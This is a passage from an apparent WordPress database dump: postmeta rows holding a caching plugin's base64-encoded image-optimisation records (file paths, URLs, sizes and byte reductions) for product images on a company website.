INSERT INTO `wp_postmeta` VALUES (28861, 2227, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9WZXJ0cmVsLVNNVC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTQ5MjE2LCJpZCI6IjIyMjcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1ZlcnRyZWwtU01ULTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9WZXJ0cmVsLVNNVC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjY0LCJ0aW1lIjoxNDgzNTQ5MjE5LCJpZCI6MjIyN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9WZXJ0cmVsLVNNVC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1ZlcnRyZWwtU01ULTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjE0NDQsInRpbWUiOjE0ODM1NDkyMjMsImlkIjoyMjI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1ZlcnRyZWwtU01ULTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9WZXJ0cmVsLVNNVC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTI2MiwidGltZSI6MTQ4MzU0OTIyNywiaWQiOjIyMjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL1ZlcnRyZWwtU01ULTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjUyNzQsInRpbWUiOjE0ODM1NDkyMzMsImlkIjoyMjI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1ZlcnRyZWwtU01ULTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9WZXJ0cmVsLVNNVC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTY0LCJ0aW1lIjoxNDgzNTQ5MjM2LCJpZCI6MjIyN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9WZXJ0cmVsLVNNVC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1ZlcnRyZWwtU01ULTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ0OSwidGltZSI6MTQ4MzU0OTI0MCwiaWQiOjIyMjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9WZXJ0cmVsLVNNVC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL1ZlcnRyZWwtU01ULTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MDAsInRpbWUiOjE0ODM1NDkyNDMsImlkIjoyMjI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1ZlcnRyZWwtU01ULTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvVmVydHJlbC1TTVQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9WZXJ0cmVsLVNNVC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTAwNSwidGltZSI6MTQ4MzU0OTI0NywiaWQiOjIyMjd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28862, 2208, 'wpfc_optimisation_reduction', '25528'); 
INSERT INTO `wp_postmeta` VALUES (28863, 2208, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yLmpwZyIsIndpZHRoIjo0ODAsImhlaWdodCI6MTk4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0yLmpwZyIsInJlZHVjdGlvbiI6MjU1MjQsInRpbWUiOjE0ODM1NDkyNTUsImlkIjoiMjIwOCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yLTM0MHgxOTguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yLTM0MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0yLTM0MHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MjU3LCJpZCI6MjIwOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTItMjUweDE5OC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTItMjUweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLTItMjUweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDkyNjEsImlkIjoyMjA4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMi0yMDB4MTk4LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMi0yMDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtMi0yMDB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTI2MywiaWQiOjIyMDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yLTIyNXgxOTguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yLTIyNXgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0yLTIyNXgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MjY1LCJpZCI6MjIwOH1d'); 
INSERT INTO `wp_postmeta` VALUES (28864, 2206, 'wpfc_optimisation_reduction', '38545'); 
INSERT INTO `wp_postmeta` VALUES (28865, 2206, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTEuanBnIiwid2lkdGgiOjQ4MCwiaGVpZ2h0IjoxOTgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy0xLmpwZyIsInJlZHVjdGlvbiI6Mzg1NDEsInRpbWUiOjE0ODM1NDkyNzIsImlkIjoiMjIwNiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtMS0zNDB4MTk4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTEtMzQweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy0xLTM0MHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5Mjc0LCJpZCI6MjIwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy0xLTI1MHgxOTguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtMS0yNTB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTEtMjUweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDkyNzcsImlkIjoyMjA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTEtMjAweDE5OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy0xLTIwMHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtMS0yMDB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTI3OSwiaWQiOjIyMDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtMS0yMjV4MTk4LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTEtMjI1eDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy0xLTIyNXgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MjgxLCJpZCI6MjIwNn1d'); 
INSERT INTO `wp_postmeta` VALUES (28866, 2205, 'wpfc_optimisation_reduction', '37901'); 
INSERT INTO `wp_postmeta` VALUES (28867, 2205, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZ2xpZGVzeXMtMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2dsaWRlc3lzLTEuanBnIiwid2lkdGgiOjQ4MCwiaGVpZ2h0IjoxOTgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9nbGlkZXN5cy0xLmpwZyIsInJlZHVjdGlvbiI6Mzc4OTcsInRpbWUiOjE0ODM1NDkyODgsImlkIjoiMjIwNSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZ2xpZGVzeXMtMS0zNDB4MTk4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2dsaWRlc3lzLTEtMzQweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9nbGlkZXN5cy0xLTM0MHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MjkwLCJpZCI6MjIwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9nbGlkZXN5cy0xLTI1MHgxOTguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZ2xpZGVzeXMtMS0yNTB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2dsaWRlc3lzLTEtMjUweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDkyOTIsImlkIjoyMjA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2dsaWRlc3lzLTEtMjAweDE5OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9nbGlkZXN5cy0xLTIwMHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZ2xpZGVzeXMtMS0yMDB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTI5NCwiaWQiOjIyMDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZ2xpZGVzeXMtMS0yMjV4MTk4LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2dsaWRlc3lzLTEtMjI1eDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9nbGlkZXN5cy0xLTIyNXgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5Mjk2LCJpZCI6MjIwNX1d'); 
INSERT INTO `wp_postmeta` VALUES (28868, 2202, 'wpfc_optimisation_reduction', '34910'); 
INSERT INTO `wp_postmeta` VALUES (28869, 2202, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmluaXNoLWxpbmUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9maW5pc2gtbGluZS5qcGciLCJ3aWR0aCI6NDgwLCJoZWlnaHQiOjE5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZpbmlzaC1saW5lLmpwZyIsInJlZHVjdGlvbiI6MzQ5MDYsInRpbWUiOjE0ODM1NDkzMDMsImlkIjoiMjIwMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmluaXNoLWxpbmUtMzQweDE5OC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9maW5pc2gtbGluZS0zNDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZpbmlzaC1saW5lLTM0MHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MzA1LCJpZCI6MjIwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9maW5pc2gtbGluZS0yNTB4MTk4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZpbmlzaC1saW5lLTI1MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZmluaXNoLWxpbmUtMjUweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDkzMDcsImlkIjoyMjAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZpbmlzaC1saW5lLTIwMHgxOTguanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvX